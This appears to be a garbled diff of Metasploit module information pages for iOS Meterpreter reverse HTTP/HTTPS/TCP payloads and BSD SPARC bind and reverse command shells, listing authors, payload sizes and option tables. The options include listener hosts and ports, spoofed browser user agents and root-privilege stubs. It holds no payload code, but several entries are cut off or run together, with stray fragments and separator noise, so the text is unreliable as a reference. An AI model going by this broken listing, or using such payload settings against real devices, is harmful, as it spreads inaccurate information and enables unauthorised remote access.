Brent Cook <brent_cook@rapid7.com>
|
|
||||||
timwr
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The local listener hostname
|
|
||||||
LPORT 8080 yes The local listener port
|
|
||||||
LURI no The HTTP Path
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Run the Meterpreter / Mettle server payload (stageless)
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
|
||||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
|
||||||
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
|
||||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
|
||||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
|
||||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
|
||||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
|
||||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,65 +0,0 @@
|
|||||||
|
|
||||||
Name: Apple_iOS Meterpreter, Reverse HTTPS Inline
|
|
||||||
Module: payload/apple_ios/aarch64/meterpreter_reverse_https
|
|
||||||
Platform: Apple_iOS
|
|
||||||
Arch: aarch64
|
|
||||||
Needs Admin: No
|
|
||||||
Total size
|
|
||||||
Evasion options for payload/apple_ios/aarch64/meterpreter_reverse_https:
|
|
||||||
=========================
|
|
||||||
|
|
||||||
<brent_cook@rapid7.com>
|
|
||||||
timwr
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The local listener hostname
|
|
||||||
LPORT 8443 yes The local listener port
|
|
||||||
LURI no The HTTP Path
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Run the Meterpreter / Mettle server payload (stageless)
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
|
||||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
|
||||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
|
||||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
|
||||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
|
||||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
|
||||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
|
||||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,58 +0,0 @@
|
|||||||
|
|
||||||
Name: Apple_iOS Meterpreter, Reverse TCP Inline
|
|
||||||
Module: payload/apple_ios/aarch64/meterpreter_reverse_tcp
|
|
||||||
Platform: Apple_iOS
|
|
||||||
Arch: aarch64
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 796904
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Adam Cammack <adam_cammack@rapid7.com>
|
|
||||||
Brent Cook <brent_cook@rapid7.com>
|
|
||||||
timwr
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Run the Meterpreter / Mettle server payload (stageless)
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,38 +0,0 @@
|
|||||||
|
|
||||||
Name: Apple iOS aarch64 Command Shell, Reverse TCP Inline
|
|
||||||
Module: payload/apple_ios/aarch64/shell_reverse_tcp
|
|
||||||
Platform: Apple_iOS
|
|
||||||
Arch: aarch64
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 152
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
SHELL /bin/sh yes The shell to execute.
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Connect back to attacker and spawn a command shell
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,63 +0,0 @@
|
|||||||
|
|
||||||
Name: Apple_iOS Meterpreter, Reverse HTTP Inline
|
|
||||||
Module: payload/apple_ios/armle/meterpreter_reverse_http
|
|
||||||
Platform: Apple_iOS
|
|
||||||
Arch: armle
|
|
||||||
Needs Admin: No
|
|
||||||
Total size
|
|
||||||
Evasion options for payload/apple_ios/armle/meterpreter_reverse_http:
|
|
||||||
=========================
|
|
||||||
|
|
||||||
ok <brent_cook@rapid7.com>
|
|
||||||
timwr
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The local listener hostname
|
|
||||||
LPORT 8080 yes The local listener port
|
|
||||||
LURI no The HTTP Path
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Run the Meterpreter / Mettle server payload (stageless)
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
|
||||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
|
||||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
|
||||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
|
||||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
|
||||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
|
||||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
|
||||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,65 +0,0 @@
|
|||||||
|
|
||||||
Name: Apple_iOS Meterpreter, Reverse HTTPS Inline
|
|
||||||
Module: payload/apple_ios/armle/meterpreter_reverse_https
|
|
||||||
Platform: Apple_iOS
|
|
||||||
Arch: armle
|
|
||||||
Needs Admin: No
|
|
||||||
Total size
|
|
||||||
Evasion options for payload/apple_ios/armle/meterpreter_reverse_https:
|
|
||||||
=========================
|
|
||||||
|
|
||||||
k <brent_cook@rapid7.com>
|
|
||||||
timwr
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The local listener hostname
|
|
||||||
LPORT 8443 yes The local listener port
|
|
||||||
LURI no The HTTP Path
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Run the Meterpreter / Mettle server payload (stageless)
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
|
||||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
|
||||||
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
|
||||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
|
||||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
|
||||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
|
||||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
|
||||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,58 +0,0 @@
|
|||||||
|
|
||||||
Name: Apple_iOS Meterpreter, Reverse TCP Inline
|
|
||||||
Module: payload/apple_ios/armle/meterpreter_reverse_tcp
|
|
||||||
Platform: Apple_iOS
|
|
||||||
Arch: armle
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 643824
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
Adam Cammack <adam_cammack@rapid7.com>
|
|
||||||
Brent Cook <brent_cook@rapid7.com>
|
|
||||||
timwr
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Run the Meterpreter / Mettle server payload (stageless)
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
|
||||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
|
||||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
|
||||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
|
||||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
|
||||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
|
||||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
|
||||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
|
||||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
|
||||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
|
||||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
|
||||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
|
||||||
PingbackRetries 0 yes How many additional successful pingbacks
|
|
||||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
|
||||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
|
||||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
|
||||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,38 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD Command Shell, Bind TCP Inline
|
|
||||||
Module: payload/bsd/sparc/shell_bind_tcp
|
|
||||||
Platform: BSD
|
|
||||||
Arch: sparc
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 164
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
vlad902 <vlad902@gmail.com>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
RHOST no The target address
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Listen for a connection and spawn a command shell
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AppendExit false no Append a stub that executes the exit(0) system call
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
|
||||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
|
||||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
|
|
||||||
@@ -1,45 +0,0 @@
|
|||||||
|
|
||||||
Name: BSD Command Shell, Reverse TCP Inline
|
|
||||||
Module: payload/bsd/sparc/shell_reverse_tcp
|
|
||||||
Platform: BSD
|
|
||||||
Arch: sparc
|
|
||||||
Needs Admin: No
|
|
||||||
Total size: 128
|
|
||||||
Rank: Normal
|
|
||||||
|
|
||||||
Provided by:
|
|
||||||
vlad902 <vlad902@gmail.com>
|
|
||||||
|
|
||||||
Basic options:
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
LHOST yes The listen address (an interface may be specified)
|
|
||||||
LPORT 4444 yes The listen port
|
|
||||||
|
|
||||||
Description:
|
|
||||||
Connect back to attacker and spawn a command shell
|
|
||||||
|
|
||||||
|
|
||||||
Name Current Setting Required Description
|
|
||||||
---- --------------- -------- -----------
|
|
||||||
AppendExit false no Append a stub that executes the exit(0) system call
|
|
||||||
AutoRunScript no A script to run automatically on session creation.
|
|
||||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
|
||||||
CommandShellCleanupCommand no A command to run before the session is closed
|
|
||||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
|
||||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
|
||||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
|
||||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
|
||||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
|
||||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
|
||||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
|
||||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
|
||||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
|
||||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
|
||||||
ReverseListenerComm no The specific communication channel to use for this listener
|
|
||||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
|
||||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
|
||||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
|
||||||
VERBOSE false no Enable detailed status messages
|
|
||||||
WORKSPACE no Specify the workspace for this module
|
|
||||||
